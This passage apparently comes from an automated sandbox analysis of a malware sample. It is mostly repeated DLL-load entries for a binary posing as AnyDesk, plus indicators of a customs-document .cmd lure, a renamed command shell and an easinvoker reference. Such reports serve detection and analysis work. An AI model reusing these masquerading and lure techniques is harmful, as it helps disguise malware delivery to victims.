      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: winmm.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Documentazione_Doganale_richieste_di_copia.cmdStatic file information: File size 3584667 > 1048576
      Source: Binary string: easinvoker.pdb source: AnyDesk.PIF, AnyDesk.PIF, 00000009.00000003.1719853566.000000007FA90000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000003.1720758818.000000007F880000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.2942456888.0000000002B8E000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000003.00000000.1694923446.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000000.1698590707.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000005.00000002.1703094786.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000000.1703554618.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000007.00000002.1717188834.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000000.1718131539.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000A.00000002.1719120301.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1719455704.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 